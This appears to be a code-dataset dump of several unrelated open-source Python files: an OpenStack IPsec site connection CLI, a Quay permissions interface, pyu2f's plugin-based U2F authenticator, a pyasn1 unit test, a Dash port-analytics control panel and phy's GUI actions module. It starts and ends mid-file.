parsed_args.mtu: attrs['mtu'] = parsed_args.mtu if parsed_args.enable: attrs['admin_state_up'] = True if parsed_args.disable: attrs['admin_state_up'] = False if parsed_args.initiator: attrs['initiator'] = parsed_args.initiator if parsed_args.dpd: vpn_utils.validate_dpd_dict(parsed_args.dpd) attrs['dpd'] = parsed_args.dpd if parsed_args.local_endpoint_group: _local_epg = client_manager.neutronclient.find_resource( 'endpoint_group', parsed_args.local_endpoint_group, cmd_resource='endpoint_group')['id'] attrs['local_ep_group_id'] = _local_epg if parsed_args.peer_endpoint_group: _peer_epg = client_manager.neutronclient.find_resource( 'endpoint_group', parsed_args.peer_endpoint_group, cmd_resource='endpoint_group')['id'] attrs['peer_ep_group_id'] = _peer_epg if parsed_args.peer_cidrs: attrs['peer_cidrs'] = parsed_args.peer_cidrs if parsed_args.local_id: attrs['local_id'] = parsed_args.local_id return attrs class CreateIPsecSiteConnection(command.ShowOne): _description = _("Create an IPsec site connection") def get_parser(self, prog_name): parser = super(CreateIPsecSiteConnection, self).get_parser(prog_name) _get_common_parser(parser) parser.add_argument( '--peer-id', required=True, help=_('Peer router identity for authentication. Can be ' 'IPv4/IPv6 address, e-mail address, key id, or FQDN')) parser.add_argument( '--peer-address', required=True, help=_('Peer gateway public IPv4/IPv6 address or FQDN')) parser.add_argument( '--psk', required=True, help=_('Pre-shared key string.')) parser.add_argument( '--vpnservice', metavar='VPNSERVICE', required=True, help=_('VPN service instance associated with this ' 'connection (name or ID)')) parser.add_argument( '--ikepolicy', metavar='IKEPOLICY', required=True, help=_('IKE policy associated with this connection (name or ID)')) parser.add_argument( '--ipsecpolicy', metavar='IPSECPOLICY', required=True, help=_('IPsec policy associated with this connection ' '(name or ID)')) parser.add_argument( 'name', metavar='<name>', help=_('Set friendly name for the connection')) osc_utils.add_project_owner_option_to_parser(parser) return parser def take_action(self, parsed_args): client = self.app.client_manager.neutronclient attrs = _get_common_attrs(self.app.client_manager, parsed_args) if parsed_args.vpnservice: _vpnservice_id = client.find_resource( 'vpnservice', parsed_args.vpnservice, cmd_resource='vpnservice')['id'] attrs['vpnservice_id'] = _vpnservice_id if parsed_args.ikepolicy: _ikepolicy_id = client.find_resource( 'ikepolicy', parsed_args.ikepolicy, cmd_resource='ikepolicy')['id'] attrs['ikepolicy_id'] = _ikepolicy_id if parsed_args.ipsecpolicy: _ipsecpolicy_id = client.find_resource( 'ipsecpolicy', parsed_args.ipsecpolicy, cmd_resource='ipsecpolicy')['id'] attrs['ipsecpolicy_id'] = _ipsecpolicy_id if parsed_args.peer_id: attrs['peer_id'] = parsed_args.peer_id if parsed_args.peer_address: attrs['peer_address'] = parsed_args.peer_address if parsed_args.psk: attrs['psk'] = parsed_args.psk if parsed_args.name: attrs['name'] = parsed_args.name if (bool(parsed_args.local_endpoint_group) != bool(parsed_args.peer_endpoint_group)): message = _("You must specify both local and peer endpoint " "groups") raise exceptions.CommandError(message) if not parsed_args.peer_cidrs and not parsed_args.local_endpoint_group: message = _("You must specify endpoint groups or peer CIDR(s)") raise exceptions.CommandError(message) obj = client.create_ipsec_site_connection( {'ipsec_site_connection': attrs})['ipsec_site_connection'] columns, display_columns = column_util.get_columns(obj, _attr_map) data = utils.get_dict_properties(obj, columns, formatters=_formatters) return display_columns, data class DeleteIPsecSiteConnection(command.Command): _description = _("Delete IPsec site connection(s)") def get_parser(self, prog_name): parser = super(DeleteIPsecSiteConnection, self).get_parser(prog_name) parser.add_argument( 'ipsec_site_connection', metavar='<ipsec-site-connection>', nargs='+', help=_('IPsec site connection to delete (name or ID)')) return parser def take_action(self, parsed_args): client = self.app.client_manager.neutronclient result = 0 for ipsec_conn in parsed_args.ipsec_site_connection: try: ipsec_con_id = client.find_resource( 'ipsec_site_connection', ipsec_conn, cmd_resource='ipsec_site_connection')['id'] client.delete_ipsec_site_connection(ipsec_con_id) except Exception as e: result += 1 LOG.error(_("Failed to delete IPsec site connection with " "name or ID '%(ipsec_site_conn)s': %(e)s"), {'ipsec_site_conn': ipsec_conn, 'e': e}) if result > 0: total = len(parsed_args.ipsec_site_connection) msg = (_("%(result)s of %(total)s IPsec site connection failed " "to delete.") % {'result': result, 'total': total}) raise exceptions.CommandError(msg) class ListIPsecSiteConnection(command.Lister): _description = _("List IPsec site connections " "that belong to a given project") def get_parser(self, prog_name): parser = super(ListIPsecSiteConnection, self).get_parser(prog_name) parser.add_argument( '--long', action='store_true', default=False, help=_("List additional fields in output") ) return parser def take_action(self, parsed_args): client = self.app.client_manager.neutronclient obj = client.list_ipsec_site_connections()['ipsec_site_connections'] headers, columns = column_util.get_column_definitions( _attr_map, long_listing=parsed_args.long) return (headers, (utils.get_dict_properties( s, columns, formatters=_formatters) for s in obj)) class SetIPsecSiteConnection(command.Command): _description = _("Set IPsec site connection properties") def get_parser(self, prog_name): parser = super(SetIPsecSiteConnection, self).get_parser(prog_name) _get_common_parser(parser) parser.add_argument( '--peer-id', help=_('Peer router identity for authentication. Can be ' 'IPv4/IPv6 address, e-mail address, key id, or FQDN')) parser.add_argument( '--peer-address', help=_('Peer gateway public IPv4/IPv6 address or FQDN')) parser.add_argument( '--name', metavar='<name>', help=_('Set friendly name for the connection')) parser.add_argument( 'ipsec_site_connection', metavar='<ipsec-site-connection>', help=_('IPsec site connection to set (name or ID)')) return parser def take_action(self, parsed_args): client = self.app.client_manager.neutronclient attrs = _get_common_attrs(self.app.client_manager, parsed_args, is_create=False) if parsed_args.peer_id: attrs['peer_id'] = parsed_args.peer_id if parsed_args.peer_address: attrs['peer_address'] = parsed_args.peer_address if parsed_args.name: attrs['name'] = parsed_args.name ipsec_conn_id = client.find_resource( 'ipsec_site_connection', parsed_args.ipsec_site_connection, cmd_resource='ipsec_site_connection')['id'] try: client.update_ipsec_site_connection( ipsec_conn_id, {'ipsec_site_connection': attrs}) except Exception as e: msg = (_("Failed to set IPsec site " "connection '%(ipsec_conn)s': %(e)s") % {'ipsec_conn': parsed_args.ipsec_site_connection, 'e': e}) raise exceptions.CommandError(msg) class ShowIPsecSiteConnection(command.ShowOne): _description = _("Show information of a given IPsec site connection") def get_parser(self, prog_name): parser = super(ShowIPsecSiteConnection, self).get_parser(prog_name) parser.add_argument( 'ipsec_site_connection', metavar='<ipsec-site-connection>', help=_('IPsec site connection to display (name or ID)')) return parser def take_action(self, parsed_args): client = self.app.client_manager.neutronclient ipsec_site_id = client.find_resource( 'ipsec_site_connection', parsed_args.ipsec_site_connection, cmd_resource='ipsec_site_connection')['id'] obj = client.show_ipsec_site_connection( ipsec_site_id)['ipsec_site_connection'] columns, display_columns = column_util.get_columns(obj, _attr_map) data = utils.get_dict_properties(obj, columns, formatters=_formatters) return (display_columns, data)
endpoints/api/permission_models_interface.py
giuseppe/quay
2,027
8631
<gh_stars>1000+ import sys from abc import ABCMeta, abstractmethod from collections import namedtuple from six import add_metaclass class SaveException(Exception): def __init__(self, other): self.traceback = sys.exc_info() super(SaveException, self).__init__(str(other)) class DeleteException(Exception): def __init__(self, other): self.traceback = sys.exc_info() super(DeleteException, self).__init__(str(other)) class Role(namedtuple("Role", ["role_name"])): def to_dict(self): return { "role": self.role_name, } class UserPermission( namedtuple( "UserPermission", [ "role_name", "username", "is_robot", "avatar", "is_org_member", "has_org", ], ) ): def to_dict(self): perm_dict = { "role": self.role_name, "name": self.username, "is_robot": self.is_robot, "avatar": self.avatar, } if self.has_org: perm_dict["is_org_member"] = self.is_org_member return perm_dict class RobotPermission( namedtuple( "RobotPermission", [ "role_name", "username", "is_robot", "is_org_member", ], ) ): def to_dict(self, user=None, team=None, org_members=None): return { "role": self.role_name, "name": self.username, "is_robot": True, "is_org_member": self.is_org_member, } class TeamPermission( namedtuple( "TeamPermission", [ "role_name", "team_name", "avatar", ], ) ): def to_dict(self): return { "role": self.role_name, "name": self.team_name, "avatar": self.avatar, } @add_metaclass(ABCMeta) class PermissionDataInterface(object): """ Data interface used by permissions API. """ @abstractmethod def get_repo_permissions_by_user(self, namespace_name, repository_name): """ Args: namespace_name: string repository_name: string Returns: list(UserPermission) """ @abstractmethod def get_repo_roles(self, username, namespace_name, repository_name): """ Args: username: string namespace_name: string repository_name: string Returns: list(Role) or None """ @abstractmethod def get_repo_permission_for_user(self, username, namespace_name, repository_name): """ Args: username: string namespace_name: string repository_name: string Returns: UserPermission """ @abstractmethod def set_repo_permission_for_user(self, username, namespace_name, repository_name, role_name): """ Args: username: string namespace_name: string repository_name: string role_name: string Returns: UserPermission Raises: SaveException """ @abstractmethod def delete_repo_permission_for_user(self, username, namespace_name, repository_name): """ Args: username: string namespace_name: string repository_name: string Returns: void Raises: DeleteException """ @abstractmethod def get_repo_permissions_by_team(self, namespace_name, repository_name): """ Args: namespace_name: string repository_name: string Returns: list(TeamPermission) """ @abstractmethod def get_repo_role_for_team(self, team_name, namespace_name, repository_name): """ Args: team_name: string namespace_name: string repository_name: string Returns: Role """ @abstractmethod def set_repo_permission_for_team(self, team_name, namespace_name, repository_name, permission): """ Args: team_name: string namespace_name: string repository_name: string permission: string Returns: TeamPermission Raises: SaveException """ @abstractmethod def delete_repo_permission_for_team(self, team_name, namespace_name, repository_name): """ Args: team_name: string namespace_name: string repository_name: string Returns: TeamPermission Raises: DeleteException """
desktop/core/ext-py/pyu2f-0.1.4/pyu2f/convenience/customauthenticator.py
yetsun/hue
5,079
8643
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Class to offload the end to end flow of U2F signing.""" import base64 import hashlib import json import os import struct import subprocess import sys from pyu2f import errors from pyu2f import model from pyu2f.convenience import baseauthenticator SK_SIGNING_PLUGIN_ENV_VAR = 'SK_SIGNING_PLUGIN' U2F_SIGNATURE_TIMEOUT_SECONDS = 5 SK_SIGNING_PLUGIN_NO_ERROR = 0 SK_SIGNING_PLUGIN_TOUCH_REQUIRED = 0x6985 SK_SIGNING_PLUGIN_WRONG_DATA = 0x6A80 class CustomAuthenticator(baseauthenticator.BaseAuthenticator): """Offloads U2F signing to a pluggable command-line tool. Offloads U2F signing to a signing plugin which takes the form of a command-line tool. The command-line tool is configurable via the SK_SIGNING_PLUGIN environment variable. The signing plugin should implement the following interface: Communication occurs over stdin/stdout, and messages are both sent and received in the form: [4 bytes - payload size (little-endian)][variable bytes - json payload] Signing Request JSON { "type": "sign_helper_request", "signData": [{ "keyHandle": <url-safe base64-encoded key handle>, "appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>, "challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>, "version": U2F protocol version (usually "U2F_V2") },...], "timeoutSeconds": <security key touch timeout> } Signing Response JSON { "type": "sign_helper_reply", "code": <result code>. "errorDetail": <text description of error>, "responseData": { "appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>, "challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>, "keyHandle": <url-safe base64-encoded key handle>, "version": <U2F protocol version>, "signatureData": <url-safe base64-encoded signature> } } Possible response error codes are: NoError = 0 UnknownError = -127 TouchRequired = 0x6985 WrongData = 0x6a80 """ def __init__(self, origin): self.origin = origin def Authenticate(self, app_id, challenge_data, print_callback=sys.stderr.write): """See base class.""" # Ensure environment variable is present plugin_cmd = os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) if plugin_cmd is None: raise errors.PluginError('{} env var is not set' .format(SK_SIGNING_PLUGIN_ENV_VAR)) # Prepare input to signer client_data_map, signing_input = self._BuildPluginRequest( app_id, challenge_data, self.origin) # Call plugin print_callback('Please insert and touch your security key\n') response = self._CallPlugin([plugin_cmd], signing_input) # Handle response key_challenge_pair = (response['keyHandle'], response['challengeHash']) client_data_json = client_data_map[key_challenge_pair] client_data = client_data_json.encode() return self._BuildAuthenticatorResponse(app_id, client_data, response) def IsAvailable(self): """See base class.""" return os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) is not None def _BuildPluginRequest(self, app_id, challenge_data, origin): """Builds a JSON request in the form that the plugin expects.""" client_data_map = {} encoded_challenges = [] app_id_hash_encoded = self._Base64Encode(self._SHA256(app_id)) for challenge_item in challenge_data: key = challenge_item['key'] key_handle_encoded = self._Base64Encode(key.key_handle) raw_challenge = challenge_item['challenge'] client_data_json = model.ClientData( model.ClientData.TYP_AUTHENTICATION, raw_challenge, origin).GetJson() challenge_hash_encoded = self._Base64Encode( self._SHA256(client_data_json)) # Populate challenges list encoded_challenges.append({ 'appIdHash': app_id_hash_encoded, 'challengeHash': challenge_hash_encoded, 'keyHandle': key_handle_encoded, 'version': key.version, }) # Populate ClientData map key_challenge_pair = (key_handle_encoded, challenge_hash_encoded) client_data_map[key_challenge_pair] = client_data_json signing_request = { 'type': 'sign_helper_request', 'signData': encoded_challenges, 'timeoutSeconds': U2F_SIGNATURE_TIMEOUT_SECONDS, 'localAlways': True } return client_data_map, json.dumps(signing_request) def _BuildAuthenticatorResponse(self, app_id, client_data, plugin_response): """Builds the response to return to the caller.""" encoded_client_data = self._Base64Encode(client_data) signature_data = str(plugin_response['signatureData']) key_handle = str(plugin_response['keyHandle']) response = { 'clientData': encoded_client_data, 'signatureData': signature_data, 'applicationId': app_id, 'keyHandle': key_handle, } return response def _CallPlugin(self, cmd, input_json): """Calls the plugin and validates the response.""" # Calculate length of input input_length = len(input_json) length_bytes_le = struct.pack('<I', input_length) request = length_bytes_le + input_json.encode() # Call plugin sign_process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) stdout = sign_process.communicate(request)[0] exit_status = sign_process.wait() # Parse and validate response size response_len_le = stdout[:4] response_len = struct.unpack('<I', response_len_le)[0] response = stdout[4:] if response_len != len(response): raise errors.PluginError( 'Plugin response length {} does not match data {} (exit_status={})' .format(response_len, len(response), exit_status)) # Ensure valid json try: json_response = json.loads(response.decode()) except ValueError: raise errors.PluginError('Plugin returned invalid output (exit_status={})' .format(exit_status)) # Ensure response type if json_response.get('type') != 'sign_helper_reply': raise errors.PluginError('Plugin returned invalid response type ' '(exit_status={})' .format(exit_status)) # Parse response codes result_code = json_response.get('code') if result_code is None: raise errors.PluginError('Plugin missing result code (exit_status={})' .format(exit_status)) # Handle errors if result_code == SK_SIGNING_PLUGIN_TOUCH_REQUIRED: raise errors.U2FError(errors.U2FError.TIMEOUT) elif result_code == SK_SIGNING_PLUGIN_WRONG_DATA: raise errors.U2FError(errors.U2FError.DEVICE_INELIGIBLE) elif result_code != SK_SIGNING_PLUGIN_NO_ERROR: raise errors.PluginError( 'Plugin failed with error {} - {} (exit_status={})' .format(result_code, json_response.get('errorDetail'), exit_status)) # Ensure response data is present response_data = json_response.get('responseData') if response_data is None: raise errors.PluginErrors( 'Plugin returned output with missing responseData (exit_status={})' .format(exit_status)) return response_data def _SHA256(self, string): """Helper method to perform SHA256.""" md = hashlib.sha256() md.update(string.encode()) return md.digest() def _Base64Encode(self, bytes_data): """Helper method to base64 encode, strip padding, and return str result.""" return base64.urlsafe_b64encode(bytes_data).decode().rstrip('=')
desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py
yetsun/hue
5,079
8694
<filename>desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py<gh_stars>1000+ # # This file is part of pyasn1 software. # # Copyright (c) 2005-2019, <NAME> <<EMAIL>> # License: http://snmplabs.com/pyasn1/license.html # import sys try: import unittest2 as unittest except ImportError: import unittest from tests.base import BaseTestCase from pyasn1.type import namedval class NamedValuesCaseBase(BaseTestCase): def setUp(self): BaseTestCase.setUp(self) self.e = namedval.NamedValues(('off', 0), ('on', 1)) def testDict(self): assert set(self.e.items()) == set([('off', 0), ('on', 1)]) assert set(self.e.keys()) == set(['off', 'on']) assert set(self.e) == set(['off', 'on']) assert set(self.e.values()) == set([0, 1]) assert 'on' in self.e and 'off' in self.e and 'xxx' not in self.e assert 0 in self.e and 1 in self.e and 2 not in self.e def testInit(self): assert namedval.NamedValues(off=0, on=1) == {'off': 0, 'on': 1} assert namedval.NamedValues('off', 'on') == {'off': 0, 'on': 1} assert namedval.NamedValues(('c', 0)) == {'c': 0} assert namedval.NamedValues('a', 'b', ('c', 0), d=1) == {'c': 0, 'd': 1, 'a': 2, 'b': 3} def testLen(self): assert len(self.e) == 2 assert len(namedval.NamedValues()) == 0 def testAdd(self): assert namedval.NamedValues(off=0) + namedval.NamedValues(on=1) == {'off': 0, 'on': 1} def testClone(self): assert namedval.NamedValues(off=0).clone(('on', 1)) == {'off': 0, 'on': 1} assert namedval.NamedValues(off=0).clone(on=1) == {'off': 0, 'on': 1} def testStrRepr(self): assert str(self.e) assert repr(self.e) suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__]) if __name__ == '__main__': unittest.TextTestRunner(verbosity=2).run(suite)
apps/dash-port-analytics/app/ui/tab_map_controls.py
JeroenvdSande/dash-sample-apps
2,332
8721
<reponame>JeroenvdSande/dash-sample-apps import dash_core_components as dcc import dash_html_components as html from config import strings def make_tab_port_map_controls( port_arr: list, port_val: str, vessel_types_arr: list, vessel_type_val: str, year_arr: list, year_val: int, month_arr: list, month_val: int, ) -> html.Div: """ Returns a HTML div of user controls found on top of the map tab. :param port_arr: list, all possible ports :param port_val: str, current port value :param vessel_types_arr: list, all possible vessel types :param vessel_type_val: str, current vessel type value :param year_arr: list, all possible years :param year_val: str, current year value :param month_arr: list, all possible months :param month_val: str, current month value :return: HTML div """ return html.Div( className="tab-port-map-controls", children=[ html.Div( className="tab-port-map-single-control-container area-a", children=[ html.Label( className="control-label", children=[strings.LABEL_PORT] ), dcc.Dropdown( id="port-map-dropdown-port", clearable=False, options=[{"label": port, "value": port} for port in port_arr], value=port_val, ), ], ), html.Div(className="tab-port-map-single-control-separator area-b"), html.Div( className="tab-port-map-single-control-container area-c", children=[ html.Label( className="control-label", children=[strings.LABEL_VESSEL] ), dcc.Dropdown( id="port-map-dropdown-vessel-type", clearable=False, options=[ {"label": vessel_type, "value": vessel_type} for vessel_type in vessel_types_arr ], value=vessel_type_val, ), ], ), html.Div(className="tab-port-map-single-control-separator area-d"), html.Div( className="tab-port-map-single-control-container date-grid area-e", children=[ html.Div( className="tab-port-map-single-control-container-date", children=[ html.Label( className="control-label", children=[strings.LABEL_YEAR] ), dcc.Dropdown( id="port-map-dropdown-year", clearable=False, options=[ {"label": year, "value": year} for year in year_arr ], value=year_val, ), ], ), html.Div( className="tab-port-map-single-control-separator smaller-line" ), html.Div( className="tab-port-map-single-control-container-date", children=[ html.Label( className="control-label", children=[strings.LABEL_MONTH], ), dcc.Dropdown( id="port-map-dropdown-month", clearable=False, options=[ {"label": month, "value": month} for month in month_arr ], value=month_val, ), ], ), ], ), ], )
phy/gui/actions.py
ycanerol/phy
118
8738
<filename>phy/gui/actions.py # -*- coding: utf-8 -*- """Actions and snippets.""" # ----------------------------------------------------------------------------- # Imports # ----------------------------------------------------------------------------- import inspect from functools import partial, wraps import logging import re import sys import traceback from .qt import QKeySequence, QAction, require_qt, input_dialog, busy_cursor, _get_icon from phylib.utils import Bunch logger = logging.getLogger(__name__) # ----------------------------------------------------------------------------- # Snippet parsing utilities # ----------------------------------------------------------------------------- def _parse_arg(s): """Parse a number or string.""" try: return int(s) except ValueError: pass try: return float(s) except ValueError: pass return s def _parse_list(s): """Parse a comma-separated list of values (strings or numbers).""" # Range: 'x-y' if '-' in s: m, M = map(_parse_arg, s.split('-')) return list(range(m, M + 1)) # List of ids: 'x,y,z' elif ',' in s: return list(map(_parse_arg, s.split(','))) else: return _parse_arg(s) def _parse_snippet(s): """Parse an entire snippet command.""" return tuple(map(_parse_list, s.split(' '))) def _prompt_args(title, docstring, default=None): """Display a prompt dialog requesting function arguments. 'default' is a function returning the default value for the proposed input dialog. """ # There are args, need to display the dialog. # Extract Example: `...` in the docstring to put a predefined text # in the input dialog. logger.debug("Prompting arguments for %s", title) r = re.search('Example: `([^`]+)`', docstring) docstring_ = docstring[:r.start()].strip() if r else docstring try: text = str(default()) if default else (r.group(1) if r else None) except Exception as e: # pragma: no cover logger.error("Error while handling user input: %s", str(e)) return s, ok = input_dialog(title, docstring_, text) if not ok or not s: return # Parse user-supplied arguments and call the function. args = _parse_snippet(s) return args # ----------------------------------------------------------------------------- # Show shortcut utility functions # ----------------------------------------------------------------------------- def _get_shortcut_string(shortcut): """Return a string representation of a shortcut.""" if not shortcut: return '' if isinstance(shortcut, (tuple, list)): return ', '.join([_get_shortcut_string(s) for s in shortcut]) if isinstance(shortcut, str): if hasattr(QKeySequence, shortcut): shortcut = QKeySequence(getattr(QKeySequence, shortcut)) else: return shortcut.lower() assert isinstance(shortcut, QKeySequence) s = shortcut.toString() or '' return str(s).lower() def _get_qkeysequence(shortcut): """Return a QKeySequence or list of QKeySequence from a shortcut string.""" if shortcut is None: return [] if isinstance(shortcut, (tuple, list)): return [_get_qkeysequence(s) for s in shortcut] assert isinstance(shortcut, str) if hasattr(QKeySequence, shortcut): return QKeySequence(getattr(QKeySequence, shortcut)) sequence = QKeySequence.fromString(shortcut) assert not sequence.isEmpty() return sequence def _show_shortcuts(shortcuts): """Display shortcuts.""" out = [] for n in sorted(shortcuts): shortcut = _get_shortcut_string(shortcuts[n]) if not n.startswith('_') and not shortcut.startswith('-'): out.append('- {0:<40} {1:s}'.format(n, shortcut)) if out: print('Keyboard shortcuts') print('\n'.join(out)) print('') def _show_snippets(snippets): """Display snippets.""" out = [] for n in sorted(snippets): snippet = snippets[n] if not n.startswith('_'): out.append('- {0:<40} :{1:s}'.format(n, snippet)) if out: print('Snippets') print('\n'.join(out)) print('') def show_shortcuts_snippets(actions): """Show the shortcuts and snippets of an Actions instance.""" print(actions.name) print('-' * len(actions.name)) print() _show_shortcuts(actions.shortcuts) _show_snippets(actions._default_snippets) # ----------------------------------------------------------------------------- # Actions # ----------------------------------------------------------------------------- def _alias(name): # Get the alias from the character after & if it exists. alias = name[name.index('&') + 1] if '&' in name else name alias = alias.replace(' ', '_').lower() return alias def _expected_args(f): if isinstance(f, partial): argspec = inspect.getfullargspec(f.func) else: argspec = inspect.getfullargspec(f) f_args = argspec.args if 'self' in f_args: f_args.remove('self') # Remove arguments with defaults from the list. if len(argspec.defaults or ()): f_args = f_args[:-len(argspec.defaults)] # Remove arguments supplied in a partial. if isinstance(f, partial): f_args = f_args[len(f.args):] f_args = [arg for arg in f_args if arg not in f.keywords] return tuple(f_args) @require_qt def _create_qaction(gui, **kwargs): # Create the QAction instance. name = kwargs.get('name', '') name = name[0].upper() + name[1:].replace('_', ' ') action = QAction(name, gui) # Show an input dialog if there are args. callback = kwargs.get('callback', None) title = getattr(callback, '__name__', 'action') # Number of expected arguments. n_args = kwargs.get('n_args', None) or len(_expected_args(callback)) @wraps(callback) def wrapped(is_checked, *args): if kwargs.get('checkable', None): args = (is_checked,) + args if kwargs.get('prompt', None): args += _prompt_args( title, docstring, default=kwargs.get('prompt_default', None)) or () if not args: # pragma: no cover logger.debug("User cancelled input prompt, aborting.") return if len(args) < n_args: logger.warning( "Invalid function arguments: expecting %d but got %d", n_args, len(args)) return try: # Set a busy cursor if set_busy is True. with busy_cursor(kwargs.get('set_busy', None)): return callback(*args) except Exception: # pragma: no cover logger.warning("Error when executing action %s.", name) logger.debug(''.join(traceback.format_exception(*sys.exc_info()))) action.triggered.connect(wrapped) sequence = _get_qkeysequence(kwargs.get('shortcut', None)) if not isinstance(sequence, (tuple, list)): sequence = [sequence] action.setShortcuts(sequence) assert kwargs.get('docstring', None) docstring = re.sub(r'\s+', ' ', kwargs.get('docstring', None)) docstring += ' (alias: {})'.format(kwargs.get('alias', None)) action.setStatusTip(docstring) action.setWhatsThis(docstring) action.setCheckable(kwargs.get('checkable', None)) action.setChecked(kwargs.get('checked', None)) if kwargs.get('icon', None): action.setIcon(_get_icon(kwargs['icon'])) return action class Actions(object): """Group of actions bound to a GUI. This class attaches to a GUI and implements the following features: * Add and remove actions * Keyboard shortcuts for the actions * Display all shortcuts Constructor ----------- gui : GUI instance name : str Name of this group of actions. menu : str Name of the GUI menu that will contain the actions. submenu : str Name of the GUI submenu that will contain the actions. default_shortcuts : dict Map action names to keyboard shortcuts (regular strings). default_snippets : dict Map action names to snippets (regular strings). """ def __init__( self, gui, name=None, menu=None, submenu=None, view=None, insert_menu_before=None, default_shortcuts=None, default_snippets=None): self._actions_dict = {} self._aliases = {} self._default_shortcuts = default_shortcuts or {} self._default_snippets = default_snippets or {} assert name self.name = name self.menu = menu self.submenu = submenu self.view = view self.view_submenu = None self.insert_menu_before = insert_menu_before self._view_submenus = {} self.gui = gui gui.actions.append(self) # Create the menu when creating the Actions instance. if menu: gui.get_menu(menu, insert_menu_before) def _get_menu(self, menu=None, submenu=None, view=None, view_submenu=None): """Return the QMenu depending on a combination of keyword arguments.""" # Defaults. menu = menu or self.menu submenu = submenu or self.submenu view = view or self.view view_submenu = view_submenu or self.view_submenu # If the action is a view action, it should be added to the view's menu in the dock widget. if view: if view_submenu and view_submenu not in self._view_submenus: self._view_submenus[view_submenu] = view.dock._menu.addMenu(view_submenu) if view_submenu: return self._view_submenus[view_submenu] else: return view.dock._menu # Create the submenu if there is one. if submenu: # Create the submenu. self.gui.get_submenu(menu, submenu) # Make sure the action gets added to the submenu. menu = submenu if menu: return self.gui.get_menu(menu) def add(self, callback=None, name=None, shortcut=None, alias=None, prompt=False, n_args=None, docstring=None, menu=None, submenu=None, view=None, view_submenu=None, verbose=True, checkable=False, checked=False, set_busy=False, prompt_default=None, show_shortcut=True, icon=None, toolbar=False): """Add an action with a keyboard shortcut. Parameters ---------- callback : function Take no argument if checkable is False, or a boolean (checked) if it is True name : str Action name, the callback's name by default. shortcut : str The keyboard shortcut for this action. alias : str Snippet, the name by default. prompt : boolean Whether this action should display a dialog with an input box where the user can write arguments to the callback function. n_args : int If prompt is True, specify the number of expected arguments. set_busy : boolean Whether to use a busy cursor while performing the action. prompt_default : str The default text in the input text box, if prompt is True. docstring : str The action docstring, to be displayed in the status bar when hovering over the action item in the menu. By default, the function's docstring. menu : str The name of the menu where the action should be added. It is automatically created if it doesn't exist. submenu : str The name of the submenu where the action should be added. It is automatically created if it doesn't exist. view : QWidget A view that belongs to the GUI, if the actions are to be added to the view's menu bar. view_submenu : str The name of a submenu in the view menu. checkable : boolean Whether the action is checkable (toggle on/off). checked : boolean Whether the checkable action is initially checked or not. show_shortcut : boolean Whether to show the shortcut in the Help action that displays all GUI shortcuts. icon : str Hexadecimal code of the font-awesome icon. toolbar : boolean Whether to add the action to the toolbar. """ param_names = sorted(inspect.signature(Actions.add).parameters) l = locals() kwargs = {param_name: l[param_name] for param_name in param_names if param_name != 'self'} if callback is None: # Allow to use either add(func) or @add or @add(...). kwargs.pop('callback', None) return partial(self.add, **kwargs) assert callback # Get the name from the callback function if needed. name = name or callback.__name__ alias = alias or self._default_snippets.get(name, _alias(name)).split(' ')[0] name = name.replace('&', '') shortcut = shortcut or self._default_shortcuts.get(name, None) # Skip existing action. if name in self._actions_dict: return # Set the status tip from the function's docstring. docstring = docstring or callback.__doc__ or name docstring = re.sub(r'[ \t\r\f\v]{2,}', ' ', docstring.strip()) # Create and register the action. kwargs.update(name=name, alias=alias, shortcut=shortcut, docstring=docstring) action = _create_qaction(self.gui, **kwargs) action_obj = Bunch(qaction=action, **kwargs) if verbose and not name.startswith('_'): logger.log(5, "Add action `%s` (%s).", name, _get_shortcut_string(action.shortcut())) self.gui.addAction(action) # Do not show private actions in the menu. if not name.startswith('_'): # Find the menu in which the action should be added. qmenu = self._get_menu( menu=menu, submenu=submenu, view=view, view_submenu=view_submenu) if qmenu: qmenu.addAction(action) # Add the action to the toolbar. if toolbar: self.gui._toolbar.show() self.gui._toolbar.addAction(action) self._actions_dict[name] = action_obj # Register the alias -> name mapping. self._aliases[alias] = name # Set the callback method. if callback: setattr(self, name.lower().replace(' ', '_').replace(':', ''), callback) def separator(self, **kwargs): """Add a separator. Parameters ---------- menu : str The name of the menu where the separator should be added. It is automatically created if it doesn't exist. submenu : str The name of the submenu where the separator should be added. It is automatically created if it doesn't exist. view : QWidget A view that belongs to the GUI, if the separator is to be added to the view's menu bar. view_submenu : str The name of a submenu in the view menu. """ self._get_menu(**kwargs).addSeparator() def disable(self, name=None): """Disable all actions, or only one if a name is passed.""" if name is None: for name in self._actions_dict: self.disable(name) return self._actions_dict[name].qaction.setEnabled(False) def enable(self, name=None): """Enable all actions, or only one if a name is passed..""" if name is None: for name in self._actions_dict: self.enable(name) return self._actions_dict[name].qaction.setEnabled(True) def get(self, name): """Get a QAction instance from its name.""" return self._actions_dict[name].qaction if name in self._actions_dict else None def run(self, name, *args): """Run an action as specified by its name.""" assert isinstance(name, str) # Resolve the alias if it is an alias. name = self._aliases.get(name, name) # Get the action. action = self._actions_dict.get(name, None) if not action: raise ValueError("Action `{}` doesn't exist.".format(name)) if not name.startswith('_'): logger.debug("Execute action `%s`.", name) try: return action.callback(*args) except TypeError as e: logger.warning("Invalid action arguments: " + str(e)) return def remove(self, name): """Remove an action.""" self.gui.removeAction(self._actions_dict[name].qaction) del self._actions_dict[name] delattr(self, name) def remove_all(self): """Remove all actions.""" names = sorted(self._actions_dict.keys()) for name in names: self.remove(name) @property def shortcuts(self): """A dictionary mapping action names to keyboard shortcuts.""" out = {} for name in sorted(self._actions_dict): action = self._actions_dict[name] if not action.show_shortcut: continue # Discard actions without shortcut and without an alias. if not action.shortcut and not action.alias: continue # Only show alias for actions with no shortcut. alias_str = ' (:%s)' % action.alias if action.alias != name else '' shortcut = 